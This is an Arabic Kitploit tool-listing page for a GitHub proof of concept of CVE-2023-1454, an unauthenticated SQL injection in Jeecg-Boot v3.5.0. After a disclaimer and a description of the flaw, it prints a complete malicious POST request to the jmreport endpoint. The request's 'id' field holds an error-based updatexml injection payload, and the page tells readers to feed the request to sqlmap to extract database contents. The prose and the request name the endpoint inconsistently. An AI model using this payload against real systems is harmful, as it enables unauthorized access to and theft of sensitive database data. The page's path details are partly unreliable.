Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-1454 — CVE-2023-1454 نص اكتشاف الثغرات | Kitploit
أدوات/GitHubGitHub/bugfor-pings/cve-2023-1454
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

CVE-2023-1454 نص اكتشاف الثغرات

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-1454

نص برمجي للكشف عن الثغرة CVE-2023-1454

هذا المستند لأغراض مرجعية فقط، يُرجى عدم استخدام المواد التقنية والأدوات الواردة فيه لاختراق أي نظام حاسوبي دون إذن. أي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن استخدام المعلومات المقدمة هنا تقع على عاتق المستخدم وحده.

مقدمة Jeecg-Boot هي منصة تطوير منخفضة الكود تعتمد على مولد الأكواد، وتوفر مجموعة من مولدات الأكواد ومحركات القوالب وإدارة الصلاحيات وقواميس البيانات ووظائف استيراد وتصدير البيانات وغيرها، مما يساعد المطورين على بناء تطبيقات المؤسسات بسرعة.

نظرة عامة على الثغرة منصة Java منخفضة الكود لتطبيقات الويب المؤسسية Jeecg-Boot (الإصدار v3.5.0) تستخدم jimureport-spring-boot-starter-1.5.6.jar، وهناك خلل في فلترة الأحرف الخاصة في Jeecg-Boot. في ظل وجود الواجهة الأمامية Vue3 في الإصدار v3.5.0، يوجد في Jeecg ثغرة حقن SQL غير مصرح بها، وتقع نقطة الثغرة في المسار /querySql حيث يتم استدعاء SQL دون معالجة في id، مما يسمح بحقن الإخطار المباشر، ويمكن للمهاجم غير الموثّق عن بُعد، عن طريق إنشاء سلاسل خاصة، الحصول على معلومات حساسة من قاعدة البيانات الهدف.

الإصدارات المتأثرة الإصدار المتأثر: Jeecg-Boot = v3.5.0

احفظ حزمة البيانات كملف txt ويمكن استخدام sqlmap للحصول على البيانات

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

تنزيل الأداة